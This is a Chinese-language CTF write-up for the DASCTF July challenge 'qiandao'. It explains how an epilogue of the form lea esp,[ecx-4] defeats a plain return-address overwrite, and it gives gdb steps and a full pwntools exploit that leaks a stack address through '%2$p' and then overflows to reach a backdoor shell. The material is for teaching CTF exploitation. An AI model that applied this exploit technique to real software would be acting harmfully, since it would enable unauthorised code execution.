DASCTF七月-虚假的签到题

总结分析

这道题是一道简单的栈溢出漏洞,但是在leave指令后,利用lea指令给esp赋值别的地址,导致我们覆盖到返回地址的地址不能被跳转。

考点:

栈溢出

格式化字符串漏洞


0x1

第一步先查看一下保护机制和多少位的程序

checksec  ./qiandao

32位程序只有NX保护扔进IDA观察


简单分析

1.main函数的最后有一个将ebp转为esp的代码,如果你栈溢出破坏了ebp,会导致[ecx-4]报错。

2.leave以后会修改esp为ecx-4,而ecx的值为ebp-4地址上的值。也就是:esp=[ebp-4]-4。

3.因此我们首先需要利用格式化字符漏洞泄漏栈地址,然后修改ebp-4为我们可控的地址,并且修改该地址-4处的值为backdoor,我们就可以获得shell了。

详细分析

大概了解一下函数返回时leave、ret、lea、mov四条指令的本质

1.leave指令相当于mov esp,ebp; pop ebp;即恢复上一个函数的栈结构

2.ret指令则相当于pop esp;也就是在ebp出栈之后,esp其实是指向返回地址的,就会将当前栈顶内容弹出到eip中进行执行

3.lea是load effective address的缩写,简单的说,lea指令可以用来将一个内存地址直接赋给目的操作数,例如:lea eax,[ebx+8]就是将ebx+8这个值直接赋给eax,而不是把ebx+8处的内存地址里的数据赋给eax。

4.而mov指令则恰恰相反,例如:mov eax,[ebx+8]则是把内存地址为ebx+8处的数据赋给eax。

再看一下这道题目中函数调用结束的指令:

\bullet 在leave和ret之间执行了lea esp,[ecx-4]也就是将esp指向了ecx-4这个地址,我们看到前面的mov ecx,[ebp+var_4]得知了ecx存放的是ebp+var_4地址上的内容,而var_4是栈上比ebp低四字节的位置:也就是说esp=[ebp-4]-4。

思路总结

1.格式化字符串泄露栈地址

2.利用gets修改ebp-4的值为可控地址

3.修改可控地址-4处的值为backdoor

0x2

格式化字符漏洞泄露栈地址

在printf下断点/进行调试

gdb -q ./qiandao

b printf

r

bbbb

x/20wx 0xffffd040


通过打印0xffffd040处的内容的,发现了栈偏移为2


0x3


\bullet exp如下

from pwn import *

p = process('./qiandao')

#p = remote('ip',port)

back_addr = 0x0804857d

payload_1 = '%2$p'

p.recvuntil("name:")

p.sendline(payload_1)

p.recvuntil('0x')

stack_ebp = int(p.recv(8),16)

#prinf srack_ebp

stack_ecx = stack_ebp - 4 

p.recvuntil("problem?")

payload_2 = 'a'*32 + p32(back_addr) + p32(stack_ecx)

p.sendline(payload_2)

p.interactive()


0x4

总结一下心里感受:南上加南。


推荐其他师傅的wp

Chumen77's Blog       

自留地

ggb0n's Blog

ILIB's Blog

ptr's Blog

starssgo's csdn

此篇文章如果存在问题,还望大佬批评指正

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。